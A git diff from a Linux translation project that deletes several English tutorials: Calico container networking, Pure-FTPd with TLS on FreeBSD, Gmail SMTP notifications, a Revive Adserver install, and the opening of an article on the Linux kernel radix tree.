- Status: Downloaded newer image for ubuntu:latest
- 24e2d5d7d6f3990b534b5643c0e483da5b4620a1ac2a5b921b2ba08ebf754746
-
- # docker run --net=none --name workload-D -tid ubuntu
-
- c6f28d1ab8f7ac1d9ccc48e6e4234972ed790205c9ca4538b506bec4dc533555
-
-Similarly, if we have more nodes, we can run ubuntu docker container into it by running the above command with assigning a different container name.
-
-### 6. Assigning IP addresses ###
-
-After we have got our docker containers running in each of our hosts, we'll go for adding a networking support to the containers. Now, we'll gonna assign a new ip address to each of the containers using calicoctl. This will add a new network interface to the containers with the assigned ip addresses. To do so, we'll need to run the following commands in the hosts running the containers.
-
-#### On 1st Node ####
-
- # calicoctl container add workload-A 192.168.0.1
- # calicoctl container add workload-B 192.168.0.2
-
-#### On 2nd Node ####
-
- # calicoctl container add workload-C 192.168.0.3
- # calicoctl container add workload-D 192.168.0.4
-
-### 7. Adding Policy Profiles ###
-
-After our containers have got networking interfaces and ip address assigned, we'll now need to add policy profiles to enable networking between the containers each other. After adding the profiles, the containers will be able to communicate to each other only if they have the common profiles assigned. That means, if they have different profiles assigned, they won't be able to communicate to eachother. So, before being able to assign. we'll need to first create some new profiles. That can be done in either of the hosts. Here, we'll run the following command in 1st Node.
-
- # calicoctl profile add A_C
-
- Created profile A_C
-
- # calicoctl profile add B_D
-
- Created profile B_D
-
-After the profile has been created, we'll simply add our workload to the required profile. Here, in this tutorial, we'll place workload A and workload C in a common profile A_C and workload B and D in a common profile B_D. To do so, we'll run the following command in our hosts.
-
-#### On 1st Node ####
-
- # calicoctl container workload-A profile append A_C
- # calicoctl container workload-B profile append B_D
-
-#### On 2nd Node ####
-
- # calicoctl container workload-C profile append A_C
- # calicoctl container workload-D profile append B_D
-
-### 8. Testing the Network ###
-
-After we've added a policy profile to each of our containers using Calicoctl, we'll now test whether our networking is working as expected or not. We'll take a node and a workload and try to communicate with the other containers running in same or different nodes. And due to the profile, we should be able to communicate only with the containers having a common profile. So, in this case, workload A should be able to communicate with only C and vice versa whereas workload A shouldn't be able to communicate with B or D. To test the network, we'll gonna ping the containers having common profiles from the 1st host running workload A and B.
-
-We'll first ping workload-C having ip 192.168.0.3 using workload-A as shown below.
-
- # docker exec workload-A ping -c 4 192.168.0.3
-
-Then, we'll ping workload-D having ip 192.168.0.4 using workload-B as shown below.
-
- # docker exec workload-B ping -c 4 192.168.0.4
-
-![Ping Test Success](http://blog.linoxide.com/wp-content/uploads/2015/10/ping-test-success.png)
-
-Now, we'll check if we're able to ping the containers having different profiles. We'll now ping workload-D having ip address 192.168.0.4 using workload-A.
-
- # docker exec workload-A ping -c 4 192.168.0.4
-
-After done, we'll try to ping workload-C having ip address 192.168.0.3 using workload-B.
-
- # docker exec workload-B ping -c 4 192.168.0.3
-
-![Ping Test Failed](http://blog.linoxide.com/wp-content/uploads/2015/10/ping-test-failed.png)
-
-Hence, the workloads having same profiles could ping each other whereas having different profiles couldn't ping to each other.
-
-### Conclusion ###
-
-Calico is an awesome project providing an easy way to configure a virtual network using the latest docker technology. It is considered as a great open source solution for virtual networking in cloud data centers. Calico is being experimented by people in different cloud platforms like AWS, DigitalOcean, GCE and more these days. As Calico is currently under experiment, its stable version hasn't been released yet and is still in pre-release. The project consists a well documented documentations, tutorials and manuals in their [official documentation site][2].
-
---------------------------------------------------------------------------------
-
-via: http://linoxide.com/linux-how-to/calico-virtual-private-networking-docker/
-
-作者:[Arun Pyasi][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://linoxide.com/author/arunp/
-[1]:http://docs.projectcalico.org/
\ No newline at end of file
diff --git a/sources/tech/20151104 How to Install Pure-FTPd with TLS on FreeBSD 10.2.md b/sources/tech/20151104 How to Install Pure-FTPd with TLS on FreeBSD 10.2.md
deleted file mode 100644
index 3d898340d8..0000000000
--- a/sources/tech/20151104 How to Install Pure-FTPd with TLS on FreeBSD 10.2.md
+++ /dev/null
@@ -1,154 +0,0 @@
-How to Install Pure-FTPd with TLS on FreeBSD 10.2
-================================================================================
-FTP or File Transfer Protocol is application layer standard network protocol used to transfer file from the client to the server, after user logged in to the FTP server over the TCP-Network, such as internet. FTP has been round long time ago, much longer then P2P Program, or World Wide Web, and until this day it was a primary method for sharing file with other over the internet and it it remain very popular even today. FTP provide an secure transmission, that protect username, password and encrypt the content with SSL/TLS.
-
-Pure-FTPd is free FTP Server with strong and focus on the software security. It was great choice for you if you want to provide a fast, secure, lightweight with feature rich FTP Services. Pure-FTPd can be install on variety of Unix-like operating system, include Linux and FreeBSD. Pure-FTPd is created by Frank Dennis in 2001, based on Troll-FTPd, and until now is actively developed by a team led by Dennis.
-
-In this tutorial we will provide about installation and configuration of "**Pure-FTPd**" with Unix-like operating system FreeBSD 10.2.
-
-### Step 1 - Update system ###
-
-The first thing you must do is to install and update the freebsd repository, please connect to your server with SSH and then type command below as sudo/root :
-
- freebsd-update fetch
- freebsd-update install
-
-### Step 2 - Install Pure-FTPd ###
-
-You can install Pure-FTPd from the ports method, but in this tutorial we will install from the freebsd repository with "**pkg**" command. So, now let's install :
-
- pkg install pure-ftpd
-
-Once installation is finished, please add pure-ftpd to the start at the boot time with sysrc command below :
-
- sysrc pureftpd_enable=yes
-
-### Step 3 - Configure Pure-FTPd ###
-
-Configuration file for Pure-FTPd is located at directory "/usr/local/etc/", please go to the directory and copy the sample configuration for pure-ftpd to "**pure-ftpd.conf**".
-
- cd /usr/local/etc/
- cp pure-ftpd.conf.sample pure-ftpd.conf
-
-Now edit the file configuration with nano editor :
-
- nano -c pure-ftpd.conf
-
-Note : -c option to show line number on nano.
-
-Go to line 59 and change the value of "VerboseLog" to "**yes**". This option is allow you as administrator to see the log all command used by the users.
-
- VerboseLog yes
-
-And now look at line 126 "PureDB" for virtual-users configuration. Virtual users is a simple mechanism to store a list of users, with their password, name, uid, directory, etc. It's just like /etc/passwd. But it's not /etc/passwd. It's a different file and only for FTP. In this tutorial we will store the list of user to the file "**/usr/local/etc/pureftpd.passwd**" and "**/usr/local/etc/pureftpd.pdb**". Please uncomment that line and change the path for the file to "/usr/local/etc/pureftpd.pdb".
-
- PureDB /usr/local/etc/pureftpd.pdb
-
-Next, uncomment on the line 336 "**CreateHomeDir**", this option make you easy to add the virtual users, allow automatically create home directories if they are missing.
-
- CreateHomeDir yes
-
-Save and exit.
-
-Next, start pure-ftpd with service command :
-
- service pure-ftpd start
-
-### Step 4 - Adding New Users ###
-
-At this step FTP server is started without error, but you can not log in to the FTP Server, because the default configuration of pure-ftpd is disabled for anonymous users. We need to create new users with home directory, and then give it the password for login.
-
-On thing you must do befere you add new user to pure-ftpd virtual-user is to create a system user for this, lets create new system user "**vftp**" and the default group is same as username, with home directory "**/home/vftp/**".
-
- pw useradd vftp -s /sbin/nologin -w no -d /home/vftp \
- -c "Virtual User Pure-FTPd" -m
-
-Now you can add the new user for the FTP Server with "**pure-pw**" command. For an example here, we will create new user named "**akari**", so please see command below :
-
- pure-pw useradd akari -u vftp -g vftp -d /home/vftp/akari
- Password: TYPE YOUR PASSWORD
-
-that command will create user "**akari**" and the data stored at the file "**/usr/local/etc/pureftpd.passwd**", not at /etc/passwd file, so this means is that you can easily create FTP-only accounts without messing up your system accounts.
-
-Next, you must generate the PureDB user database with this command :
-
- pure-pw mkdb
-
-Now restart the pure-ftpd services and try connect with user "akari" :
-
- service pure-ftpd restart
-
-Trying to connect with user akari :
-
- ftp SERVERIP
-
-![FTP Connect user akari](http://blog.linoxide.com/wp-content/uploads/2015/10/FTP-Connect-user-akari.png)
-
-**NOTE :**
-
-If you want to add new user again, you can use "**pure-pw**" command. And if you want to delete the current user, you can use this :
-
- pure-pw userdel useryouwanttodelete
- pure-pw mkdb
-
-### Step 5 - Add SSL/TLS to Pure-FTPd ###
-
-Pure-FTPd supports encryption using TLS security mechanisms. To support for TLS/SSL, make sure the OpenSSL library is already installed on your freebsd system.
-
-Now you must generate new "**self-signed certificate**" on the directory "**/etc/ssl/private**". Before you generate the certificate, please create new directory there called "private".
-
- cd /etc/ssl/
- mkdir private
- cd private/
-
-Now generate "self-signed certificate" with openssl command below :
-
- openssl req -x509 -nodes -newkey rsa:2048 -sha256 -keyout \
- /etc/ssl/private/pure-ftpd.pem \
- -out /etc/ssl/private/pure-ftpd.pem
-
-FILL ALL WITH YOUR PERSONAL INFO.
-
-![Generate Certificate pem](http://blog.linoxide.com/wp-content/uploads/2015/10/Generate-Certificate-pem.png)
-
-Next, change the certificate permission :
-
- chmod 600 /etc/ssl/private/*.pem
-
-Once the certifcate is generated, Edit the pure-ftpd configuration file :
-
- nano -c /usr/local/etc/pure-ftpd.conf
-
-Uncomment on line **423** to enable the TLS :
-
- TLS 1
-
-And line **439** for the certificate file path :
-
- CertFile /etc/ssl/private/pure-ftpd.pem
-
-Save and exit, then restart the pure-ftpd services :
-
- service pure-ftpd restart
-
-Now let's test the Pure-FTPd that work with TLS/SSL. I'm here use "**FileZilla**" to connect to the FTP Server, and use user "**akari**" that have been created.
-
-![Pure-FTPd with TLS SUpport](http://blog.linoxide.com/wp-content/uploads/2015/10/Pure-FTPd-with-TLS-SUpport.png)
-
-Pure-FTPd with TLS on FreeBSD 10.2 successfully.
-
-### Conclusion ###
-
-FTP or File Transfer Protocol is standart protocol used to transfer file between users and the server. One of the best, lightweight and secure FTP Server Software is Pure-FTPd. It is secure and support for TLS/SSL encryption mechanism. Pure-FTPd is easy to to install and configure, you can manage the user with virtual user support, and it is make you as sysadmin is easy to manage the user if you have a much user ftp server.
-
---------------------------------------------------------------------------------
-
-via: http://linoxide.com/linux-how-to/install-pure-ftpd-tls-freebsd-10-2/
-
-作者:[Arul][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://linoxide.com/author/arulm/
\ No newline at end of file
diff --git a/sources/tech/20151109 How to send email notifications using Gmail SMTP server on Linux.md b/sources/tech/20151109 How to send email notifications using Gmail SMTP server on Linux.md
deleted file mode 100644
index 22e8606c6c..0000000000
--- a/sources/tech/20151109 How to send email notifications using Gmail SMTP server on Linux.md
+++ /dev/null
@@ -1,157 +0,0 @@
-Translating by KnightJoker
-How to send email notifications using Gmail SMTP server on Linux
-================================================================================
-Suppose you want to configure a Linux app to send out email messages from your server or desktop. The email messages can be part of email newsletters, status updates (e.g., [Cachet][1]), monitoring alerts (e.g., [Monit][2]), disk events (e.g., [RAID mdadm][3]), and so on. While you can set up your [own outgoing mail server][4] to deliver messages, you can alternatively rely on a freely available public SMTP server as a maintenance-free option.
-
-One of the most reliable **free SMTP servers** is from Google's Gmail service. All you have to do to send email notifications within your app is to add Gmail's SMTP server address and your credentials to the app, and you are good to go.
-
-One catch with using Gmail's SMTP server is that there are various restrictions in place, mainly to combat spammers and email marketers who often abuse the server. For example, you can send messages to no more than 100 addresses at once, and no more than 500 recipients per day. Also, if you don't want to be flagged as a spammer, you cannot send a large number of undeliverable messages. When any of these limitations is reached, your Gmail account will temporarily be locked out for a day. In short, Gmail's SMTP server is perfectly fine for your personal use, but not meant for commercial bulk emails.
-
-With that being said, let me demonstrate **how to use Gmail's SMTP server in Linux environment**.
-
-### Google Gmail SMTP Server Setting ###
-
-If you want to send emails from your app using Gmail's SMTP server, remember the following details.
-
-- **Outgoing mail server (SMTP server)**: smtp.gmail.com
-- **Use authentication**: yes
-- **Use secure connection**: yes
-- **Username**: your Gmail account ID (e.g., "alice" if your email is alice@gmail.com)
-- **Password**: your Gmail password
-- **Port**: 587
-
-Exact configuration syntax may vary depending on apps. In the rest of this tutorial, I will show you several useful examples of using Gmail SMTP server in Linux.
-
-### Send Emails from the Command Line ###
-
-As the first example, let's try the most basic email functionality: send an email from the command line using Gmail SMTP server. For this, I am going to use a command-line email client called mutt.
-
-First, install mutt:
-
-For Debian-based system:
-
- $ sudo apt-get install mutt
-
-For Red Hat based system:
-
- $ sudo yum install mutt
-
-Create a mutt configuration file (~/.muttrc) and specify in the file Gmail SMTP server information as follows. Replace with your own Gmail ID. Note that this configuration is for sending emails only (not receiving emails).
-
- $ vi ~/.muttrc
-
-----------
-
- set from = "@gmail.com"
- set realname = "Dan Nanni"
- set smtp_url = "smtp://@smtp.gmail.com:587/"
- set smtp_pass = ""
-
-Now you are ready to send out an email using mutt:
-
- $ echo "This is an email body." | mutt -s "This is an email subject" alice@yahoo.com
-
-To attach a file in an email, use "-a" option:
-
- $ echo "This is an email body." | mutt -s "This is an email subject" alice@yahoo.com -a ~/test_attachment.jpg
-
-![](https://c1.staticflickr.com/1/770/22239850784_5fb0988075_c.jpg)
-
-Using Gmail SMTP server means that the emails appear as sent from your Gmail account. In other words, a recepient will see your Gmail address as the sender's address. If you want to use your domain as the email sender, you need to use Gmail SMTP relay service instead.
-
-### Send Email Notification When a Server is Rebooted ###
-
-If you are running a [virtual private server (VPS)][5] for some critical website, one recommendation is to monitor VPS reboot activities. As a more practical example, let's consider how to set up email notifications for every reboot event on your VPS. Here I assume you are using systemd on your VPS, and show you how to create a custom systemd boot-time service for automatic email notifications.
-
-First create the following script reboot_notify.sh which takes care of email notifications.
-
- $ sudo vi /usr/local/bin/reboot_notify.sh
-
-----------
-
- #!/bin/sh
-
- echo "`hostname` was rebooted on `date`" | mutt -F /etc/muttrc -s "Notification on `hostname`" alice@yahoo.com
-
-----------
-
- $ sudo chmod +x /usr/local/bin/reboot_notify.sh
-
-In the script, I use "-F" option to specify the location of system-wide mutt configuration file. So don't forget to create /etc/muttrc file and populate Gmail SMTP information as described earlier.
-
-Now let's create a custom systemd service as follows.
-
- $ sudo mkdir -p /usr/local/lib/systemd/system
- $ sudo vi /usr/local/lib/systemd/system/reboot-task.service
-
-----------
-
- [Unit]
- Description=Send a notification email when the server gets rebooted
- DefaultDependencies=no
- Before=reboot.target
-
- [Service]
- Type=oneshot
- ExecStart=/usr/local/bin/reboot_notify.sh
-
- [Install]
- WantedBy=reboot.target
-
-Once the service file is created, enable and start the service.
-
- $ sudo systemctl enable reboot-task
- $ sudo systemctl start reboot-task
-
-From now on, you will be receiving a notification email every time the VPS gets rebooted.
-
-![](https://c1.staticflickr.com/1/608/22241452923_2ace9cde2e_c.jpg)
-
-### Send Email Notification from Server Usage Monitoring ###
-
-As a final example, let me present a real-world application called [Monit][6], which is a pretty useful server monitoring application. It comes with comprehensive [VPS][7] monitoring capabilities (e.g., CPU, memory, processes, file system), as well as email notification functions.
-
-If you want to receive email notifications for any event on your VPS (e.g., server overload) generated by Monit, you can add the following SMTP information to Monit configuration file.
-
- set mailserver smtp.gmail.com port 587
- username "" password ""
- using tlsv12
-
- set mail-format {
- from: @gmail.com
- subject: $SERVICE $EVENT at $DATE on $HOST
- message: Monit $ACTION $SERVICE $EVENT at $DATE on $HOST : $DESCRIPTION.
-
- Yours sincerely,
- Monit
- }
-
- # the person who will receive notification emails
- set alert alice@yahoo.com
-
-Here is the example email notification sent by Monit for excessive CPU load.
-
-![](https://c1.staticflickr.com/1/566/22873764251_8fe66bfd16_c.jpg)
-
-### Conclusion ###
-
-As you can imagine, there will be so many different ways to take advantage of free SMTP servers like Gmail. But once again, remember that the free SMTP server is not meant for commercial usage, but only for your own personal project. If you are using Gmail SMTP server inside any app, feel free to share your use case.
-
---------------------------------------------------------------------------------
-
-via: http://xmodulo.com/send-email-notifications-gmail-smtp-server-linux.html
-
-作者:[Dan Nanni][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://xmodulo.com/author/nanni
-[1]:http://xmodulo.com/setup-system-status-page.html
-[2]:http://xmodulo.com/server-monitoring-system-monit.html
-[3]:http://xmodulo.com/create-software-raid1-array-mdadm-linux.html
-[4]:http://xmodulo.com/mail-server-ubuntu-debian.html
-[5]:http://xmodulo.com/go/digitalocean
-[6]:http://xmodulo.com/server-monitoring-system-monit.html
-[7]:http://xmodulo.com/go/digitalocean
\ No newline at end of file
diff --git a/sources/tech/20151119 How to Install Revive Adserver on Ubuntu 15.04 or CentOS 7.md b/sources/tech/20151119 How to Install Revive Adserver on Ubuntu 15.04 or CentOS 7.md
deleted file mode 100644
index 3b6277da80..0000000000
--- a/sources/tech/20151119 How to Install Revive Adserver on Ubuntu 15.04 or CentOS 7.md
+++ /dev/null
@@ -1,242 +0,0 @@
-How to Install Revive Adserver on Ubuntu 15.04 / CentOS 7
-================================================================================
-Revive AdserverHow to Install Revive Adserver on Ubuntu 15.04 / CentOS 7 is a free and open source advertisement management system that enables publishers, ad networks and advertisers to serve ads on websites, apps, videos and manage campaigns for multiple advertiser with many features. Revive Adserver is licensed under GNU Public License which is also known as OpenX Source. It features an integrated banner management interface, URL targeting, geo-targeting and tracking system for gathering statistics. This application enables website owners to manage banners from both in-house advertisement campaigns as well as from paid or third-party sources, such as Google's AdSense. Here, in this tutorial, we'll gonna install Revive Adserver in our machine running Ubuntu 15.04 or CentOS 7.
-
-### 1. Installing LAMP Stack ###
-
-First of all, as Revive Adserver requires a complete LAMP Stack to work, we'll gonna install it. LAMP Stack is the combination of Apache Web Server, MySQL/MariaDB Database Server and PHP modules. To run Revive properly, we'll need to install some PHP modules like apc, zlib, xml, pcre, mysql and mbstring. To setup LAMP Stack, we'll need to run the following command with respect to the distribution of linux we are currently running.
-
-#### On Ubuntu 15.04 ####
-
- # apt-get install apache2 mariadb-server php5 php5-gd php5-mysql php5-curl php-apc zlibc zlib1g zlib1g-dev libpcre3 libpcre3-dev libapache2-mod-php5 zip
-
-#### On CentOS 7 ####
-
- # yum install httpd mariadb php php-gd php-mysql php-curl php-mbstring php-xml php-apc zlibc zlib1g zlib1g-dev libpcre3 libpcre3-dev zip
-
-### 2. Starting Apache and MariaDB server ###
-
-We’ll now start our newly installed Apache web server and MariaDB database server in our linux machine. To do so, we'll need to execute the following commands.
-
-#### On Ubuntu 15.04 ####
-
-Ubuntu 15.04 is shipped with Systemd as its default init system, so we'll need to execute the following commands to start apache and mariadb daemons.
-
- # systemctl start apache2 mysql
-
-After its started, we'll now make it able to start automatically in every system boot by running the following command.
-
- # systemctl enable apache2 mysql
-
- Synchronizing state for apache2.service with sysvinit using update-rc.d...
- Executing /usr/sbin/update-rc.d apache2 defaults
- Executing /usr/sbin/update-rc.d apache2 enable
- Synchronizing state for mysql.service with sysvinit using update-rc.d...
- Executing /usr/sbin/update-rc.d mysql defaults
- Executing /usr/sbin/update-rc.d mysql enable
-
-#### On CentOS 7 ####
-
-Also in CentOS 7, systemd is the default init system so, we'll run the following command to start them.
-
- # systemctl start httpd mariadb
-
-Next, we'll enable them to start automatically in every startup of init system using the following command.
-
- # systemctl enable httpd mariadb
-
- ln -s '/usr/lib/systemd/system/httpd.service' '/etc/systemd/system/multi-user.target.wants/httpd.service'
- ln -s '/usr/lib/systemd/system/mariadb.service' '/etc/systemd/system/multi-user.target.wants/mariadb.service'
-
-### 3. Configuring MariaDB ###
-
-#### On CentOS 7/Ubuntu 15.04 ####
-
-Now, as we are starting MariaDB for the first time and no password has been assigned for MariaDB so, we’ll first need to configure a root password for it. Then, we’ll gonna create a new database so that it can store data for our Revive Adserver installation.
-
-To configure MariaDB and assign a root password, we’ll need to run the following command.
-
- # mysql_secure_installation
-
-This will ask us to enter the password for root but as we haven’t set any password before and its our first time we’ve installed mariadb, we’ll simply press enter and go further. Then, we’ll be asked to set root password, here we’ll hit Y and enter our password for root of MariaDB. Then, we’ll simply hit enter to set the default values for the further configurations.
-
- ….
- so you should just press enter here.
-
- Enter current password for root (enter for none):
- OK, successfully used password, moving on…
-
- Setting the root password ensures that nobody can log into the MariaDB
- root user without the proper authorisation.
-
- Set root password? [Y/n] y
- New password:
- Re-enter new password:
- Password updated successfully!
- Reloading privilege tables..
- … Success!
- …
- installation should now be secure.
- Thanks for using MariaDB!
-
-![Configuring MariaDB](http://blog.linoxide.com/wp-content/uploads/2015/11/configuring-mariadb.png)
-
-### 4. Creating new Database ###
-
-After we have assigned the password to our root user of mariadb server, we'll now create a new database for Revive Adserver application so that it can store its data into the database server. To do so, first we'll need to login to our MariaDB console by running the following command.
-
- # mysql -u root -p
-
-Then, it will ask us to enter the password of root user which we had just set in the above step. Then, we'll be welcomed into the MariaDB console in which we'll create our new database, database user and assign its password and grant all privileges to create, remove and edit the tables and data stored in it.
-
- > CREATE DATABASE revivedb;
- > CREATE USER 'reviveuser'@'localhost' IDENTIFIED BY 'Pa$$worD123';
- > GRANT ALL PRIVILEGES ON revivedb.* TO 'reviveuser'@'localhost';
- > FLUSH PRIVILEGES;
- > EXIT;
-
-![Creating Mariadb Revive Database](http://blog.linoxide.com/wp-content/uploads/2015/11/creating-mariadb-revive-database.png)
-
-### 5. Downloading Revive Adserver Package ###
-
-Next, we'll download the latest release of Revive Adserver ie version 3.2.2 in the time of writing this article. So, we'll first get the download link from the official Download Page of Revive Adserver ie [http://www.revive-adserver.com/download/][1] then we'll download the compressed zip file using wget command under /tmp/ directory as shown bellow.
-
- # cd /tmp/
- # wget http://download.revive-adserver.com/revive-adserver-3.2.2.zip
-
- --2015-11-09 17:03:48-- http://download.revive-adserver.com/revive-adserver-3.2.2.zip
- Resolving download.revive-adserver.com (download.revive-adserver.com)... 54.230.119.219, 54.239.132.177, 54.230.116.214, ...
- Connecting to download.revive-adserver.com (download.revive-adserver.com)|54.230.119.219|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 11663620 (11M) [application/zip]
- Saving to: 'revive-adserver-3.2.2.zip'
- revive-adserver-3.2 100%[=====================>] 11.12M 1.80MB/s in 13s
- 2015-11-09 17:04:02 (906 KB/s) - 'revive-adserver-3.2.2.zip' saved [11663620/11663620]
-
-After the file is downloaded, we'll simply extract its files and directories using unzip command.
-
- # unzip revive-adserver-3.2.2.zip
-
-Then, we'll gonna move the entire Revive directories including every files from /tmp to the default webroot of Apache Web Server ie /var/www/html/ directory.
-
- # mv revive-adserver-3.2.2 /var/www/html/reviveads
-
-### 6. Configuring Apache Web Server ###
-
-We'll now configure our Apache Server so that revive will run with proper configuration. To do so, we'll create a new virtualhost by creating a new configuration file named reviveads.conf . The directory here may differ from one distribution to another, here is how we create in the following distributions of linux.
-
-#### On Ubuntu 15.04 ####
-
- # touch /etc/apache2/sites-available/reviveads.conf
- # ln -s /etc/apache2/sites-available/reviveads.conf /etc/apache2/sites-enabled/reviveads.conf
- # nano /etc/apache2/sites-available/reviveads.conf
-
-Now, we'll gonna add the following lines of configuration into this file using our favorite text editor.
-
-
- ServerAdmin info@reviveads.linoxide.com
- DocumentRoot /var/www/html/reviveads/
- ServerName reviveads.linoxide.com
- ServerAlias www.reviveads.linoxide.com
-
- Options FollowSymLinks
- AllowOverride All
-
- ErrorLog /var/log/apache2/reviveads.linoxide.com-error_log
- CustomLog /var/log/apache2/reviveads.linoxide.com-access_log common
-
-
-![Configuring Apache2 Ubuntu](http://blog.linoxide.com/wp-content/uploads/2015/11/configuring-apache2-ubuntu.png)
-
-After done, we'll gonna save the file and exit our text editor. Then, we'll restart our Apache Web server.
-
- # systemctl restart apache2
-
-#### On CentOS 7 ####
-
-In CentOS, we'll directly create the file reviveads.conf under /etc/httpd/conf.d/ directory using our favorite text editor.
-
- # nano /etc/httpd/conf.d/reviveads.conf
-
-Then, we'll gonna add the following lines of configuration into the file.
-
-
- ServerAdmin info@reviveads.linoxide.com
- DocumentRoot /var/www/html/reviveads/
- ServerName reviveads.linoxide.com
- ServerAlias www.reviveads.linoxide.com
-
- Options FollowSymLinks
- AllowOverride All
-
- ErrorLog /var/log/httpd/reviveads.linoxide.com-error_log
- CustomLog /var/log/httpd/reviveads.linoxide.com-access_log common
-
-
-![Configuring httpd Centos](http://blog.linoxide.com/wp-content/uploads/2015/11/configuring-httpd-centos.png)
-
-Once done, we'll simply save the file and exit the editor. And then, we'll gonna restart our apache web server.
-
- # systemctl restart httpd
-
-### 7. Fixing Permissions and Ownership ###
-
-Now, we'll gonna fix some file permissions and ownership of the installation path. First, we'll gonna set the ownership of the installation directory to Apache process owner so that apache web server will have full access of the files and directories to edit, create and delete.
-
-#### On Ubuntu 15.04 ####
-
- # chown www-data: -R /var/www/html/reviveads
-
-#### On CentOS 7 ####
-
- # chown apache: -R /var/www/html/reviveads
-
-### 8. Allowing Firewall ###
-
-Now, we'll gonna configure our firewall programs to allow port 80 (http) so that our apache web server running Revive Adserver will be accessible from other machines in the network across the default http port ie 80.
-
-#### On Ubuntu 15.04/CentOS 7 ####
-
-As CentOS 7 and Ubuntu 15.04 both has systemd installed by default, it contains firewalld running as firewall program. In order to open the port 80 (http service) on firewalld, we'll need to execute the following commands.
-
- # firewall-cmd --permanent --add-service=http
-
- success
-
- # firewall-cmd --reload
-
- success
-
-### 9. Web Installation ###
-
-Finally, after everything is done as expected, we'll now be able to access the web interface of the application using a web browser. We can go further towards the web installation, by pointing the web browser to the web server we are running in our linux machine. To do so, we'll need to point our web browser to http://ip-address/ or http://domain.com assigned to our linux machine. Here, in this tutorial, we'll point our browser to http://reviveads.linoxide.com/ .
-
-Here, we'll see the Welcome page of the installation of Revive Adserver with the GNU General Public License V2 as Revive Adserver is released under this license. Then, we'll simply click on I agree button in order to continue the installation.
-
-In the next page, we'll need to enter the required database information in order to connect Revive Adserver with the MariaDB database server. Here, we'll need to enter the database name, user and password that we had set in the above step. In this tutorial, we entered database name, user and password as revivedb, reviveuser and Pa$$worD123 respectively then, we set the hostname as localhost and continue further.
-
-![Configuring Revive Adserver](http://blog.linoxide.com/wp-content/uploads/2015/11/configuring-revive-adserver.png)
-
-We'll now enter the required information like administration username, password and email address so that we can use these information to login to the dashboard of our Adserver. After done, we'll head towards the Finish page in which we'll see that we have successfully installed Revive Adserver in our server.
-
-Next, we'll be redirected to the Adverstiser page where we'll add new Advertisers and manage them. Then, we'll be able to navigate to our Dashboard, add new users to the adserver, add new campaign for our advertisers, banners, websites, video ads and everything that its built with.
-
-For enabling more configurations and access towards the administrative settings, we can switch our Dashboard user to the Administrator account. This will add new administrative menus in the dashboard like Plugins, Configuration through which we can add and manage plugins and configure many features and elements of Revive Adserver.
-
-### Conclusion ###
-
-In this article, we learned some information on what is Revive Adserver and how we can setup on linux machine running Ubuntu 15.04 and CentOS 7 distributions. Though Revive Adserver's initial source code was bought from OpenX, currently the code base for OpenX Enterprise and Revive Adserver are completely separate. To extend more features, we can install more plugins which we can also find from [http://www.adserverplugins.com/][2] . Really, this piece of software has changed the way of managing the ads for websites, apps, videos and made it very easy and efficient. If you have any questions, suggestions, feedback please write them in the comment box below so that we can improve or update our contents. Thank you !
-
---------------------------------------------------------------------------------
-
-via: http://linoxide.com/linux-how-to/install-revive-adserver-ubuntu-15-04-centos-7/
-
-作者:[Arun Pyasi][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://linoxide.com/author/arunp/
-[1]:http://www.revive-adserver.com/download/
-[2]:http://www.adserverplugins.com/
\ No newline at end of file
diff --git a/sources/tech/20151123 Data Structures in the Linux Kernel.md b/sources/tech/20151123 Data Structures in the Linux Kernel.md
deleted file mode 100644
index d344eacd97..0000000000
--- a/sources/tech/20151123 Data Structures in the Linux Kernel.md
+++ /dev/null
@@ -1,203 +0,0 @@
-Translating by DongShuaike
-
-Data Structures in the Linux Kernel
-================================================================================
-
-Radix tree
---------------------------------------------------------------------------------
-
-As you already know linux kernel provides many different libraries and functions which implement different data structures and algorithms. In this part we will consider one of these data structures - [Radix tree](http://en.wikipedia.org/wiki/Radix_tree). There are two files which are related to `radix tree` implementation and API in the linux kernel:
-
-* [include/linux/radix-tree.h](https://github.com/torvalds/linux/blob/master/include/linux/radix-tree.h)
-* [lib/radix-tree.c](https://github.com/torvalds/linux/blob/master/lib/radix-tree.c)
-
-Lets talk about what a `radix tree` is. Radix tree is a `compressed trie` where a [trie](http://en.wikipedia.org/wiki/Trie) is a data structure which implements an interface of an associative array and allows to store values as `key-value`. The keys are usually strings, but any data type can be used. A trie is different from an `n-tree` because of its nodes. Nodes of a trie do not store keys; instead, a node of a trie stores single character labels. The key which is related to a given node is derived by traversing from the root of the tree to this node. For example:
-
-
-```
- +-----------+
- | |
- | " " |
- | |
- +------+-----------+------+
- | |
- | |
- +----v------+ +-----v-----+
- | | | |
- | g | | c |
- | | | |
- +-----------+ +-----------+
- | |
- | |
- +----v------+ +-----v-----+
- | | | |
- | o | | a |
- | | | |
- +-----------+ +-----------+
- |
- |
- +-----v-----+
- | |
- | t |
- | |
- +-----------+
-```
-
-So in this example, we can see the `trie` with keys, `go` and `cat`. The compressed trie or `radix tree` differs from `trie` in that all intermediates nodes which have only one child are removed.
-
-Radix tree in linux kernel is the datastructure which maps values to integer keys. It is represented by the following structures from the file [include/linux/radix-tree.h](https://github.com/torvalds/linux/blob/master/include/linux/radix-tree.h):
-
-```C
-struct radix_tree_root {
- unsigned int height;
- gfp_t gfp_mask;
- struct radix_tree_node __rcu *rnode;
-};
-```
-
-This structure presents the root of a radix tree and contains three fields:
-
-* `height` - height of the tree;
-* `gfp_mask` - tells how memory allocations will be performed;
-* `rnode` - pointer to the child node.
-
-The first field we will discuss is `gfp_mask`:
-
